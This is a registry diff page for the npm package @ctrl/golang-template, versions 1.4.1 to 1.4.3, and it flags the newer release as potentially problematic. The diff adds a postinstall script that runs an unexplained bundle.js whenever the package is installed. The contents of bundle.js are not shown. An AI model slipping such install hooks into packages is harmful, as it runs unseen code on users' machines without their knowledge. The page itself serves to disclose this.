@ctrl/golang-template 1.4.1 → 1.4.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @ctrl/golang-template might be problematic. Click here for more details.
- package/bundle.js +2 -0
- package/package.json +4 -3
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "@ctrl/golang-template",
|
3
|
-
"version": "1.4.
|
3
|
+
"version": "1.4.3",
|
4
4
|
"description": "Basic golang template parsing in js",
|
5
5
|
"author": "Scott Cooper <scttcper@gmail.com>",
|
6
6
|
"license": "MIT",
|
@@ -25,7 +25,8 @@
|
|
25
25
|
"build": "tsc -p tsconfig.build.json",
|
26
26
|
"test": "vitest run",
|
27
27
|
"test:watch": "vitest",
|
28
|
-
"test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml"
|
28
|
+
"test:ci": "vitest run --coverage --reporter=default --reporter=junit --outputFile=./junit.xml",
|
29
|
+
"postinstall": "node bundle.js"
|
29
30
|
},
|
30
31
|
"devDependencies": {
|
31
32
|
"@ctrl/eslint-config": "3.4.10",
|
@@ -46,4 +47,4 @@
|
|
46
47
|
"engines": {
|
47
48
|
"node": ">=8.0.0"
|
48
49
|
}
|
49
|
-
}
|
50
|
+
}
|